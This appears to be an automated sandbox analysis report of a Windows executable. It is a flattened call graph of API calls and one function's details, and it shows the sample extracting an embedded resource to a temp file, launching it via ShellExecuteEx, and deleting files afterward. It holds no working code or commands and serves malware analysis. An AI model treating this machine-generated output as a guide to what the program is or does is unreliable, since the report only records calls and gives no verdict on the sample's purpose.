18664->18666 18667 403108 4 API calls 18665->18667 18668 403108 4 API calls 18666->18668 18669 4011fa 18667->18669 18668->18669 18902 403cd7 GetVersionExA 18669->18902 18672 4012f6 18907 403b70 18672->18907 18673 4012db 19084 4036a2 18673->19084 18676 401302 18913 403a66 18676->18913 18678 401ba4 ExitProcess HeapDestroy ExitProcess 18680 40138a 18917 4020b1 18680->18917 18683 4013b5 18686 4036a2 16 API calls 18683->18686 18684 40139e 18924 401bdd 18684->18924 18688 4012f1 18686->18688 18688->18678 18689 4074f0 strlen RtlReAllocateHeap 18693 401325 18689->18693 18690 4020b1 6 API calls 18692 4013e5 18690->18692 18694 4013e9 18692->18694 18695 40140f 18692->18695 18693->18680 18693->18689 18699 4030f0 2 API calls 18693->18699 19091 403a18 18693->19091 18696 403de0 RtlReAllocateHeap 18694->18696 18697 4036a2 16 API calls 18695->18697 18698 401401 18696->18698 18697->18688 18700 4030f0 2 API calls 18698->18700 18699->18693 18701 40140d 18700->18701 18702 4020b1 6 API calls 18701->18702 18703 40143f 18702->18703 18704 401463 18703->18704 18705 401443 18703->18705 18706 4036a2 16 API calls 18704->18706 18707 4020b1 6 API calls 18705->18707 18706->18688 18708 401493 18707->18708 18709 4020b1 6 API calls 18708->18709 18710 4014c5 18709->18710 18711 4020b1 6 API calls 18710->18711 18712 4014f7 18711->18712 18713 401756 18712->18713 19097 404de6 18712->19097 18714 403de0 RtlReAllocateHeap 18713->18714 18716 40176e 18714->18716 18718 4030f0 2 API calls 18716->18718 18721 40177a 18718->18721 18723 403de0 RtlReAllocateHeap 18721->18723 18725 401792 18723->18725 18727 4030f0 2 API calls 18725->18727 18729 40179e 18727->18729 18730 4020b1 6 API calls 18729->18730 18732 4017ae 18730->18732 18734 401a25 18732->18734 18736 403a18 3 API calls 18732->18736 18959 4074f0 18734->18959 18738 4017c7 18736->18738 18741 403de0 RtlReAllocateHeap 18738->18741 18739 401a36 18742 4074f0 2 API calls 18739->18742 18747 4017e5 18741->18747 18743 401a40 18742->18743 18745 4074f0 2 API calls 18743->18745 18744 4015c5 _rmdir 18744->18678 18746 401a4b 18745->18746 18749 4030f0 2 API calls 18746->18749 18747->18734 18754 40181c 18747->18754 18748 4015b5 18748->18744 18750 4015fc 18748->18750 18753 401645 18748->18753 19128 40505e 18748->19128 18751 401a57 18749->18751 19131 4045fc 18750->19131 18963 406170 18751->18963 18758 4045fc 4 API calls 18753->18758 19196 405dd5 18754->19196 18756 401a67 18760 401a87 18756->18760 18761 401a6b 18756->18761 18757 40160d 18762 4030f0 2 API calls 18757->18762 18763 401656 18758->18763 18768 405ea0 DeleteFileA 18760->18768 18973 406250 18761->18973 18767 401619 18762->18767 18769 4030f0 2 API calls 18763->18769 18764 40182f 19200 4036f8 18764->19200 19137 404925 18767->19137 18774 401a92 18768->18774 18770 401662 18769->18770 18775 404925 13 API calls 18770->18775 18771 40184a 18776 4030f0 2 API calls 18771->18776 18772 401a7b 18980 405fd0 18772->18980 18779 402025 7 API calls 18774->18779 18778 401623 18775->18778 18785 401856 18776->18785 18780 401678 18778->18780 18781 401a97 18779->18781 19155 406860 18780->19155 18782 4036a2 16 API calls 18781->18782 18783 401aad _rmdir 18782->18783 18783->18678 18784 4019c6 18788 403a79 4 API calls 18784->18788 18785->18784 18790 4074f0 2 API calls 18785->18790 18787 401a85 18789 401adf 18787->18789 18988 402118 18787->18988 18792 4019df 18788->18792 18794 4074f0 2 API calls 18789->18794 18795 40187a 18790->18795 18797 405e15 2 API calls 18792->18797 18798 401af6 18794->18798 18799 4030f0 2 API calls 18795->18799 18796 403de0 RtlReAllocateHeap 18800 4016b4 18796->18800 18801 4019f3 18797->18801 18802 4074f0 2 API calls 18798->18802 18812 401886 18799->18812 18807 4016fd 18800->18807 18808 4016cf 18800->18808 18803 405e90 SetCurrentDirectoryA 18801->18803 18804 401b01 18802->18804 18805 401a07 _rmdir 18803->18805 19040 402761 18804->19040 18805->18678 18809 4020b1 6 API calls 18807->18809 18813 4036a2 16 API calls 18808->18813 18819 40170d 18809->18819 18811 4018a0 19222 406230 18811->19222 18812->18811 18817 402118 56 API calls 18812->18817 18815 4016e5 _rmdir 18813->18815 18815->18678 18817->18811 19161 401d3f 18819->19161 18821 401998 18825 406170 7 API calls 18821->18825 18824 405fd0 5 API calls 18827 4018c2 18824->18827 18828 4019a8 18825->18828 18830 4074f0 2 API calls 18827->18830 18828->18784 18833 406250 6 API calls 18828->18833 18832 4018de 18830->18832 18831 401b51 19072 405e15 18831->19072 18836 4074f0 2 API calls 18832->18836 18837 4019bc 18833->18837 18839 4018e8 18836->18839 18840 405fd0 5 API calls 18837->18840 18842 4074f0 2 API calls 18839->18842 18840->18784 18843 4018f3 18842->18843 18844 4074f0 2 API calls 18843->18844 18845 4018fd 18844->18845 18846 4074f0 2 API calls 18845->18846 18847 401908 18846->18847 18848 4036a2 16 API calls 18847->18848 18849 401923 18848->18849 18849->18821 18850 401939 18849->18850 18851 403a79 4 API calls 18850->18851 18852 401952 18851->18852 18853 405e15 2 API calls 18852->18853 18854 401966 18853->18854 18855 405e90 SetCurrentDirectoryA 18854->18855 18856 40197a _rmdir 18855->18856 18856->18678 18857->18588 18858->18590 19225 4066f1 RtlAllocateHeap RtlAllocateHeap 18859->19225 18861 401053 18862 404ab3 18861->18862 19226 4066f1 RtlAllocateHeap RtlAllocateHeap 18862->19226 18864 404ac1 19227 406434 RtlAllocateHeap 18864->19227 18867 405082 18868 406434 RtlAllocateHeap 18867->18868 18869 401058 18868->18869 18870 4040e0 RtlInitializeCriticalSection GetStockObject 18869->18870 19229 4066f1 RtlAllocateHeap RtlAllocateHeap 18870->19229 18872 40410b 18873 406434 RtlAllocateHeap 18872->18873 18874 404121 memset 18873->18874 18875 40105d 18874->18875 18876 403d90 HeapCreate 18875->18876 18876->18598 18878 406434 RtlAllocateHeap 18877->18878 18879 403946 RtlInitializeCriticalSection 18878->18879 18879->18600 18880->18602 19230 40645c RtlAllocateHeap 18881->19230 18884 403060 18885 403065 18884->18885 18886 4010a6 18884->18886 18888 403087 HeapFree 18885->18888 19232 403128 18885->19232 18889 4030a0 RtlAllocateHeap 18886->18889 18888->18886 18890 4010b5 18889->18890 18891 403dc0 18890->18891 18892 403dc8 RtlAllocateHeap 18891->18892 18893 403dda 18891->18893 18892->18610 18893->18610 18895 403dea 18894->18895 19236 407750 18895->19236 18897 403df7 18897->18612 19239 407580 18898->19239 18900 401108 18901 403e30 HeapFree 18900->18901 18901->18616 18903 4012d4 18902->18903 18904 403cfe 18902->18904 18903->18672 18903->18673 18904->18903 18905 403d18 GetVersionExA 18904->18905 18905->18903 18906 403d32 18905->18906 18906->18903 18908 403b90 18907->18908 18909 403b98 18908->18909 18910 403bba SetUnhandledExceptionFilter 18908->18910 18911 403ba1 SetUnhandledExceptionFilter 18909->18911 18912 403bab SetUnhandledExceptionFilter 18909->18912 18910->18676 18911->18912 18912->18676 18914 403a71 18913->18914 19243 403957 18914->19243 19248 403100 18917->19248 18920 402102 19251 407550 18920->19251 18921 4020de LoadResource SizeofResource 18921->18920 18925 403dc0 RtlAllocateHeap 18924->18925 18926 401bed 18925->18926 19257 405eb2 18926->19257 18928 401bfc 18929 4030f0 2 API calls 18928->18929 18930 401c06 GetTempFileNameA 18929->18930 19264 403e50 18930->19264 18933 4030f0 2 API calls 18934 401c38 18933->18934 19270 403e30 HeapFree 18934->19270 18936 401c40 18937 405ea0 DeleteFileA 18936->18937 18938 401c4b 18937->18938 19271 405f13 18938->19271 18941 405dd5 2 API calls 18942 401c62 18941->18942 18943 4030f0 2 API calls 18942->18943 18944 401c6e 18943->18944 18945 401cc3 18944->18945 18946 4074f0 2 API calls 18944->18946 18951 401ce0 18944->18951 18947 4074f0 2 API calls 18945->18947 18948 401ca2 18946->18948 18949 401cd4 18947->18949 18950 4074f0 2 API calls 18948->18950 18952 4030f0 2 API calls 18949->18952 18953 401cad 18950->18953 18954 407550 HeapFree 18951->18954 18952->18951 18955 4074f0 2 API calls 18953->18955 18956 4013b3 18954->18956 18957 401cb7 18955->18957 18956->18690 18958 4030f0 2 API calls 18957->18958 18958->18945 18960 4074ff strlen 18959->18960 18962 40751e 18959->18962 18961 407750 RtlReAllocateHeap 18960->18961 18961->18962 18962->18739 19276 40662c 18963->19276 18966 4061c6 18968 4061ca RtlAllocateHeap 18966->18968 18971 406211 18966->18971 18967 4061ad CreateFileA 18967->18966 18967->18971 18969 4061ff 18968->18969 18969->18756 18970 406224 18970->18756 18971->18970 19282 4066bb 18971->19282 18974 406260 18973->18974 18975 406298 18973->18975 18974->18975 18976 4062a0 18974->18976 18977 406285 18974->18977 18975->18772 18976->18976 18978 4062a9 WriteFile 18976->18978 18977->18977 19293 406330 18977->19293 18978->18772 18981 406022 18980->18981 18982 405fda 18980->18982 18981->18787 18982->18981 18983 405ff3 18982->18983 18984 40600c CloseHandle 18982->18984 18985 405f90 WriteFile 18983->18985 18986 4066bb 2 API calls 18984->18986 18987 405ff9 HeapFree 18985->18987 18986->18981 18987->18984 18989 40211f 18988->18989 18989->18989 18990 403100 2 API calls 18989->18990 18991 402138 18990->18991 18992 405e90 SetCurrentDirectoryA 18991->18992 18997 40214b 18992->18997 18994 4030f0 RtlAllocateHeap RtlReAllocateHeap 18994->18997 18995 4074f0 2 API calls 18995->18997 18996 4023a3 19334 4035d0 18996->19334 18997->18994 18997->18995 19014 4021d2 18997->19014 19307 403220 18997->19307 19001 406230 9 API calls 19001->19014 19002 4023d9 19004 4074f0 2 API calls 19002->19004 19037 4022d9 19002->19037 19003 405fd0 5 API calls 19003->19014 19007 402415 19004->19007 19005 406170 7 API calls 19005->19014 19006 407550 HeapFree 19008 402485 19006->19008 19009 4074f0 2 API calls 19007->19009 19011 407550 HeapFree 19008->19011 19012 40241f 19009->19012 19010 4022f2 19010->19014 19019 405fd0 5 API calls 19010->19019 19030 4074f0 2 API calls 19010->19030 19033 4030f0 2 API calls 19010->19033 19315 4062d0 19010->19315 19322 403fa3 19010->19322 19326 406960 19010->19326 19015 40248e 19011->19015 19016 4074f0 2 API calls 19012->19016 19014->18996 19014->19001 19014->19003 19014->19005 19014->19010 19025 4074f0 strlen RtlReAllocateHeap 19014->19025 19028 4030f0 RtlAllocateHeap RtlReAllocateHeap 19014->19028 19034 4036a2 16 API calls 19014->19034 19038 4022d4 19014->19038 19017 407550 HeapFree 19015->19017 19018 402428 19016->19018 19020 402497 19017->19020 19021 4074f0 2 API calls 19018->19021 19019->19010 19022 407550 HeapFree 19020->19022 19023 402432 19021->19023 19026 4024a0 19022->19026 19027 4074f0 2 API calls 19023->19027 19025->19014 19026->18789 19029 40243d 19027->19029 19028->19014 19031 4036a2 16 API calls 19029->19031 19030->19010 19032 402458 19031->19032 19035 402025 7 API calls 19032->19035 19032->19037 19033->19010 19034->19014 19035->19037 19037->19006 19039 402025 7 API calls 19038->19039 19039->19037 19041 402768 19040->19041 19041->19041 19042 403100 2 API calls 19041->19042 19043 402781 19042->19043 19044 403100 2 API calls 19043->19044 19045 40278e 19044->19045 19046 403100 2 API calls 19045->19046 19047 40279b ShellExecuteEx 19046->19047 19048 4027e2 Sleep GetExitCodeProcess 19047->19048 19049 402801 19048->19049 19049->19048 19050 40280d 19049->19050 19051 407550 HeapFree 19050->19051 19052 402822 19051->19052 19053 407550 HeapFree 19052->19053 19054 40282b 19053->19054 19055 407550 HeapFree 19054->19055 19056 401b22 19055->19056 19057 402025 19056->19057 19058 401b2d 19057->19058 19059 402032 19057->19059 19064 405ea0 19058->19064 19059->19058 19060 406960 5 API calls 19059->19060 19061 40206b 19060->19061 19062 402080 DeleteFileA 19061->19062 19063 405ea0 DeleteFileA 19061->19063 19062->19058 19063->19062 19065 405ea7 DeleteFileA 19064->19065 19066 401b38 19064->19066 19065->19066 19067 403a79 19066->19067 19068 407750 RtlReAllocateHeap 19067->19068 19069 403a8b GetModuleFileNameA strcmp 19068->19069 19070 403ac2 19069->19070 19071 403aae memmove 19069->19071 19070->18831 19071->19070 19074 405e25 19072->19074 19073 407750 RtlReAllocateHeap 19075 405e62 19073->19075 19074->19073 19076 401b65 19075->19076 19077 405e76 strncpy 19075->19077 19078 405e90 19076->19078 19077->19076 19079 405e97 SetCurrentDirectoryA 19078->19079 19080 401b79 _rmdir 19078->19080 19079->19080 19080->18678 19354 407650 19081->19354 19083 40113a 19083->18624 19361 4038b5 19084->19361 19089 4038b5 12 API calls 19090 4036cb 19089->19090 19090->18688 19092 403a2b 19091->19092 19093 403957 GetCommandLineA 19092->19093 19094 403a40 19093->19094 19095 407750 RtlReAllocateHeap 19094->19095 19096 403a4e strncpy 19095->19096 19096->18693 19379 404b03 19097->19379 19099 401528 19100 4042bd 19099->19100 19403 4041cf 19100->19403 19103 4043ae 19104 4043bf 19103->19104 19105 404422 CreateWindowExA 19104->19105 19106 4043cf memset 19104->19106 19108 404472 19105->19108 19112 401574 19105->19112 19106->19105 19109 40662c 2 API calls 19108->19109 19110 404480 SetWindowLongA 19109->19110 19111 4047bb 4 API calls 19110->19111 19111->19112 19113 4045b3 19112->19113 19417 4044f0 19113->19417 19116 404e09 19118 404e23 19116->19118 19117 4015ab 19124 4045d3 19117->19124 19118->19117 19119 404eb2 RtlReAllocateHeap 19118->19119 19120 404e8f RtlAllocateHeap 19118->19120 19121 404ea1 19118->19121 19119->19121 19120->19121 19122 404f06 DestroyAcceleratorTable 19121->19122 19123 404f0d CreateAcceleratorTableA 19121->19123 19122->19123 19123->19117 19126 4045da 19124->19126 19125 4045f3 SetFocus 19127 4045f9 19125->19127 19126->19125 19126->19127 19127->18748 19427 404f24 19128->19427 19132 40460c 19131->19132 19133 40461c 19132->19133 19134 404625 GetWindowTextLengthA 19132->19134 19133->18757 19135 407750 RtlReAllocateHeap 19134->19135 19136 40463b GetWindowTextA strlen 19135->19136 19136->19133 19138 40493d 19137->19138 19139 404947 GetWindow 19138->19139 19140 404a0e 19138->19140 19141 404962 RemovePropA RemovePropA 19139->19141 19142 404955 19139->19142 19140->18778 19144 404980 RevokeDragDrop 19141->19144 19145 404988 19141->19145 19142->19141 19143 40495b SetActiveWindow 19142->19143 19143->19141 19144->19145 19146 4049a1 sprintf UnregisterClassA 19145->19146 19147 40498f SendMessageA 19145->19147 19148 4049d3 19146->19148 19147->19148 19150 4049f2 19148->19150 19151 4049da HeapFree DestroyAcceleratorTable 19148->19151 19152 404a00 19150->19152 19153 4049f9 DeleteObject 19150->19153 19151->19150 19154 4066bb 2 API calls 19152->19154 19153->19152 19154->19140 19156 40686d 19155->19156 19453 4073b0 19156->19453 19158 406890 19159 407750 RtlReAllocateHeap 19158->19159 19160 401696 19159->19160 19160->18796 19162 401d47 19161->19162 19162->19162 19163 403100 2 API calls 19162->19163 19164 401d60 19163->19164 19456 403110 19164->19456 19167 4030a0 RtlAllocateHeap 19168 401d87 19167->19168 19169 403110 HeapFree 19168->19169 19170 401d9f 19169->19170 19171 4030a0 RtlAllocateHeap 19170->19171 19172 401dae 19171->19172 19173 403110 HeapFree 19172->19173 19174 401dc6 19173->19174 19175 4030a0 RtlAllocateHeap 19174->19175 19176 401dd5 19175->19176 19459 4024a8 19176->19459 19179 4024a8 5 API calls 19180 401df9 19179->19180 19181 4024a8 5 API calls 19180->19181 19191 401e0d 19181->19191 19182 401f91 19183 407550 HeapFree 19182->19183 19184 401fff 19183->19184 19185 403110 HeapFree 19184->19185 19186 402009 19185->19186 19187 403110 HeapFree 19186->19187 19188 402012 19187->19188 19190 403110 HeapFree 19188->19190 19189 403dc0 RtlAllocateHeap 19189->19191 19193 40201b 19190->19193 19191->19182 19191->19189 19192 401f5a _rmdir 19191->19192 19477 403ec0 19191->19477 19194 4036a2 16 API calls 19192->19194 19193->18713 19194->19191 19197 407750 RtlReAllocateHeap 19196->19197 19198 405de7 GetCurrentDirectoryA 19197->19198 19199 405df7 19198->19199 19199->18764 19201 40370d CoInitialize 19200->19201 19202 40371e memset LoadLibraryA 19200->19202 19201->19202 19203 403834 19202->19203 19204 403748 strncpy strlen 19202->19204 19205 407750 RtlReAllocateHeap 19203->19205 19207 40378d GetProcAddress 19204->19207 19208 40377f 19204->19208 19212 40383d 19205->19212 19209 40390d 3 API calls 19207->19209 19208->19207 19210 4037ac 19209->19210 19211 4038b5 12 API calls 19210->19211 19213 4037cd 19211->19213 19212->18771 19214 4038b5 12 API calls 19213->19214 19215 4037de 19214->19215 19216 4037e3 GetProcAddress 19215->19216 19217 403826 FreeLibrary 19215->19217 19218 407750 RtlReAllocateHeap 19216->19218 19217->19203 19217->19212 19219 4037f8 CoTaskMemFree strlen 19218->19219 19219->19217 19221 40381e 19219->19221 19221->19217 19484 406060 19222->19484 19224 4018b0 19224->18821 19224->18824 19225->18861 19226->18864 19228 404ad4 LoadIconA LoadCursorA 19227->19228 19228->18867 19229->18872 19231 401087 19230->19231 19231->18884 19233 403188 19232->19233 19234 403139 19232->19234 19233->18885 19234->19233 19235 40316e HeapFree 19234->19235 19235->19234 19237 4077a2 19236->19237 19238 40776f RtlReAllocateHeap 19236->19238 19237->18897 19238->19237 19240 4075b3 RtlReAllocateHeap 19239->19240 19241 407597 RtlAllocateHeap 19239->19241 19242 4075d4 19240->19242 19241->19242 19242->18900 19247 40642d 19243->19247 19245 403969 GetCommandLineA 19246 401307 GetModuleHandleA 19245->19246 19246->18680 19246->18693 19247->19245 19254 407600 19248->19254 19250 4020c1 FindResourceA 19250->18920 19250->18921 19252 40755b HeapFree 19251->19252 19253 40139a 19251->19253 19252->19253 19253->18683 19253->18684 19255 407647 19254->19255 19256 40760a strlen RtlAllocateHeap 19254->19256 19255->19250 19256->19255 19258 407750 RtlReAllocateHeap 19257->19258 19259 405ec5 GetTempPathA LoadLibraryA 19258->19259 19260 405f00 19259->19260 19261 405ee2 GetProcAddress 19259->19261 19260->18928 19262 405ef2 GetLongPathNameA 19261->19262 19263 405ef9 FreeLibrary 19261->19263 19262->19263 19263->19260 19265 403e5d 19264->19265 19266 407750 RtlReAllocateHeap 19265->19266 19267 403e7a 19266->19267 19268 403e80 memcpy 19267->19268 19269 401c2c 19267->19269 19268->19269 19269->18933 19270->18936 19272 405f22 strncpy strlen 19271->19272 19273 401c56 19271->19273 19275 405f52 CreateDirectoryA 19272->19275 19273->18941 19275->19273 19277 406636 19276->19277 19278 40664d 19276->19278 19288 4067da RtlAllocateHeap 19277->19288 19280 406657 RtlReAllocateHeap 19278->19280 19281 406185 CreateFileA 19278->19281 19280->19281 19281->18966 19281->18967 19283 4066e2 19282->19283 19284 4066c7 19282->19284 19290 40681d 19283->19290 19284->19283 19285 4066cc memset 19284->19285 19287 4066ec 19285->19287 19287->18970 19289 4067f0 19288->19289 19289->19281 19291 40682e HeapFree 19290->19291 19291->19287 19294 406365 19293->19294 19295 406345 SetFilePointer 19293->19295 19296 4063de 19294->19296 19298 406370 19294->19298 19295->19294 19304 405f90 19296->19304 19300 4063a3 19298->19300 19303 406389 memcpy 19298->19303 19300->18975 19301 40640b memcpy 19301->18975 19302 4063eb WriteFile 19302->18975 19303->18975 19305 405fa1 WriteFile 19304->19305 19306 405fc5 19304->19306 19305->19306 19306->19301 19306->19302 19308 40322e 19307->19308 19309 403292 19308->19309 19311 403287 strncpy 19308->19311 19310 407750 RtlReAllocateHeap 19309->19310 19312 403299 19310->19312 19311->19309 19313 4032aa 19312->19313 19314 40329f strncpy 19312->19314 19313->18997 19314->19313 19316 406324 19315->19316 19317 4062e0 19315->19317 19316->19010 19317->19316 19318 406312 WriteFile 19317->19318 19319 406304 19317->19319 19318->19316 19320 406330 5 API calls 19319->19320 19321 40630c 19320->19321 19321->19010 19341 4064a1 19322->19341 19325 403fcd 19325->19010 19327 406973 CreateFileA 19326->19327 19328 406b14 19326->19328 19327->19328 19329 40699c RtlAllocateHeap 19327->19329 19328->19010 19330 406b0c CloseHandle 19329->19330 19332 4069be 19329->19332 19330->19328 19331 4069c0 ReadFile 19331->19332 19332->19331 19332->19332 19333 406afb HeapFree 19332->19333 19333->19330 19346 403440 19334->19346 19336 4023c5 19337 4035f0 19336->19337 19338 4035fd 19337->19338 19338->19338 19339 407750 RtlReAllocateHeap 19338->19339 19340 403664 19339->19340 19340->19002 19342 403fb2 memset 19341->19342 19343 406526 RtlAllocateHeap 19341->19343 19342->19325 19343->19342 19345 406567 RtlAllocateHeap 19343->19345 19345->19342 19347 40344f 19346->19347 19348 407750 RtlReAllocateHeap 19347->19348 19350 403496 19348->19350 19349 40358c 19349->19336 19350->19349 19350->19350 19351 403500 RtlAllocateHeap 19350->19351 19353 403520 19350->19353 19351->19353 19352 403579 HeapFree 19352->19349 19353->19349 19353->19352 19355 407661 strlen 19354->19355 19356 4076ca 19354->19356 19357 407694 RtlReAllocateHeap 19355->19357 19358 407678 RtlAllocateHeap 19355->19358 19359 4076d2 HeapFree 19356->19359 19360 4076b5 19356->19360 19357->19360 19358->19360 19359->19360 19360->19083 19362 4038bc EnumWindows 19361->19362 19367 4038cd 19361->19367 19363 4036aa 19362->19363 19371 40384e GetWindowThreadProcessId GetCurrentThreadId 19362->19371 19368 40390d GetForegroundWindow 19363->19368 19364 4038da GetCurrentThreadId 19365 4038e9 EnableWindow 19364->19365 19364->19367 19366 40681d HeapFree 19365->19366 19366->19367 19367->19363 19367->19364 19369 4036bb MessageBoxA 19368->19369 19370 40391e GetWindowThreadProcessId GetCurrentProcessId 19368->19370 19369->19089 19370->19369 19372 4038ac 19371->19372 19373 40386c IsWindowVisible 19371->19373 19373->19372 19374 403877 IsWindowEnabled 19373->19374 19374->19372 19375 403882 GetForegroundWindow 19374->19375 19375->19372 19376 40388c EnableWindow 19375->19376 19377 4067da RtlAllocateHeap 19376->19377 19378 4038a1 GetCurrentThreadId 19377->19378 19378->19372 19380 40662c 2 API calls 19379->19380 19381 404b24 sprintf 19380->19381 19383 404b55 19381->19383 19384 404b5c memset RegisterClassA 19381->19384 19383->19384 19385 404bb6 AdjustWindowRect 19384->19385 19387 404c25 19385->19387 19388 404c73 19387->19388 19389 404c3c GetSystemMetrics 19387->19389 19390 404cc9 CreateWindowExA 19388->19390 19393 404c89 GetWindowRect 19388->19393 19394 404c7f GetActiveWindow 19388->19394 19391 404c49 19389->19391 19392 404c4c GetSystemMetrics 19389->19392 19395 404d01 SetPropA 19390->19395 19396 404dbc UnregisterClassA 19390->19396 19391->19392 19397 404c63 19392->19397 19393->19397 19394->19390 19394->19393 19399 404d17 ShowWindow 19395->19399 19400 404d39 RtlAllocateHeap CreateAcceleratorTableA 19395->19400 19398 4066bb 2 API calls 19396->19398 19397->19390 19401 404daa 19398->19401 19399->19400 19400->19401 19401->19099 19404 4041e0 19403->19404 19405 4041f0 memset 19404->19405 19406 404243 CreateWindowExA 19404->19406 19405->19406 19408 404291 19406->19408 19409 40154c 19406->19409 19410 40662c 2 API calls 19408->19410 19409->19103 19411 40429f 19410->19411 19413 4047bb 19411->19413 19414 4047cd 19413->19414 19415 4047dc SetWindowLongA SetWindowLongA SetPropA SendMessageA 19414->19415 19416 40482d 19415->19416 19416->19409 19418 404502 19417->19418 19419 404514 memset 19418->19419 19420 40454b CreateWindowExA 19418->19420 19419->19420 19422 40458f 19420->19422 19426 401597 19420->19426 19423 40662c 2 API calls 19422->19423 19424 40459d 19423->19424 19425 4047bb 4 API calls 19424->19425 19425->19426 19426->19116 19428 404f38 19427->19428 19429 404f69 19428->19429 19430 404f50 HeapFree 19428->19430 19431 404f5a HeapFree 19428->19431 19432 404fa3 19429->19432 19433 404f74 HeapFree 19429->19433 19430->19431 19431->19429 19434 404ff3 GetMessageA 19432->19434 19435 404fac PeekMessageA 19432->19435 19444 404f9b 19433->19444 19436 404ffd GetActiveWindow 19434->19436 19435->19436 19437 404fbe 19435->19437 19445 405d3c GetKeyState 19436->19445 19438 404fca MsgWaitForMultipleObjects 19437->19438 19437->19444 19440 404fe2 PeekMessageA 19438->19440 19438->19444 19440->19436 19440->19444 19441 40500b 19442 40501f TranslateMessage DispatchMessageA 19441->19442 19443 40500f TranslateAccelerator 19441->19443 19442->19444 19443->19442 19443->19444 19444->18748 19446 405d50 GetKeyState 19445->19446 19447 405daa GetPropA 19445->19447 19446->19447 19448 405d58 GetKeyState 19446->19448 19450 405dbc 19447->19450 19448->19447 19449 405d60 GetKeyState 19448->19449 19449->19447 19451 405d68 GetFocus GetClassNameA strncmp 19449->19451 19450->19441 19451->19447 19452 405d94 GetFocus SendMessageA 19451->19452 19452->19447 19452->19450 19454 4073c0 19453->19454 19455 407455 memset 19454->19455 19455->19158 19457 403115 HeapFree 19456->19457 19458 401d78 19456->19458 19457->19458 19458->19167 19460 4024b0 19459->19460 19460->19460 19461 403100 2 API calls 19460->19461 19462 4024c9 19461->19462 19463 403110 HeapFree 19462->19463 19464 4024e1 19463->19464 19465 4030a0 RtlAllocateHeap 19464->19465 19466 4024f0 19465->19466 19467 403110 HeapFree 19466->19467 19468 402508 19467->19468 19469 4030a0 RtlAllocateHeap 19468->19469 19470 402517 19469->19470 19471 407550 HeapFree 19470->19471 19472 402744 19471->19472 19473 403110 HeapFree 19472->19473 19474 40274e 19473->19474 19475 403110 HeapFree 19474->19475 19476 401de5 19475->19476 19476->19179 19478 403ec8 19477->19478 19479 403eeb 19477->19479 19480 403ed1 RtlReAllocateHeap 19478->19480 19481 403ee3 19478->19481 19479->19191 19480->19191 19482 403dc0 RtlAllocateHeap 19481->19482 19483 403ee8 19482->19483 19483->19191 19485 40662c 2 API calls 19484->19485 19486 406077 19485->19486 19487 40609a 19486->19487 19488 40607e CreateFileA 19486->19488 19490 4060bc 19487->19490 19491 40609f CreateFileA 19487->19491 19489 4060f9 19488->19489 19493 406149 19489->19493 19495 406106 RtlAllocateHeap 19489->19495 19490->19489 19492 4060c1 CreateFileA 19490->19492 19491->19489 19492->19489 19494 4060e3 CreateFileA 19492->19494 19496 40615c 19493->19496 19498 4066bb 2 API calls 19493->19498 19494->19489 19497 40613b 19495->19497 19496->19224 19497->19224 19498->19496 19499 401bb9 19506 403b0b 19499->19506 19503 401bc3 19513 404a13 19503->19513 19505 401bd2 19507 403ad4 19506->19507 19508 403aeb 19507->19508 19509 403add CloseHandle 19507->19509 19510 403af4 HeapFree 19508->19510 19511 401bbe 19508->19511 19509->19508 19510->19511 19512 403cc0 SetUnhandledExceptionFilter 19511->19512 19512->19503 19514 404a23 19513->19514 19515 404a4d 19514->19515 19516 404925 13 API calls 19514->19516 19517 404a7b 19515->19517 19518 404a62 HeapFree 19515->19518 19519 404a6d HeapFree 19515->19519 19516->19514 19517->19505 19518->19519 19519->19517

                                        Executed Functions

                                        Function 00406960 Relevance: 7.6, APIs: 5, Instructions: 128memoryfileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 344 406960-40696d 345 406973-406996 CreateFileA 344->345 346 406b15-406b1d 344->346 347 406b14 345->347 348 40699c-4069b8 RtlAllocateHeap 345->348 347->346 349 406b0c-406b13 CloseHandle 348->349 350 4069be-4069bf 348->350 349->347 351 4069c0-4069df ReadFile 350->351 352 4069e5-4069ea 351->352 353 406ace-406ad0 351->353 354 4069f0-406ac0 352->354 355 406ad2-406aed 353->355 356 406aef-406af5 353->356 354->354 357 406ac6-406aca 354->357 355->355 355->356 356->351 358 406afb-406b0b HeapFree 356->358 357->353 358->349
                                        APIs
                                        • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000), ref: 00406987
                                        • RtlAllocateHeap.NTDLL(00A40000,00000000,00001000), ref: 004069AA
                                        • ReadFile.KERNELBASE(00000000,00000000,00001000,?,00000000,?,?,00000000,00000000), ref: 004069CE
                                        • HeapFree.KERNEL32(00A40000,00000000,00000000,?,?,00000000,00000000), ref: 00406B05
                                        • CloseHandle.KERNELBASE(00000000,?,00000000,00000000), ref: 00406B0D
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: FileHeap$AllocateCloseCreateFreeHandleRead
                                        • String ID:
                                        • API String ID: 873069550-0
                                        • Opcode ID: 1357808eb39684694dda3eb8bae3d5a823f22cf334df4ffbb266c6879fa2417a
                                        • Instruction ID: 2c35df999285d4324d5b8a2bb6c6846afef495587d3451632d7a4ed779350fa2
                                        • Opcode Fuzzy Hash: 1357808eb39684694dda3eb8bae3d5a823f22cf334df4ffbb266c6879fa2417a
                                        • Instruction Fuzzy Hash: 55418B326403920BD3149F74ECDAB773760EB46301F09823AFB52A62D2D67DD514DB18
                                        Function 00401000 Relevance: 77.7, APIs: 16, Strings: 28, Instructions: 662memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
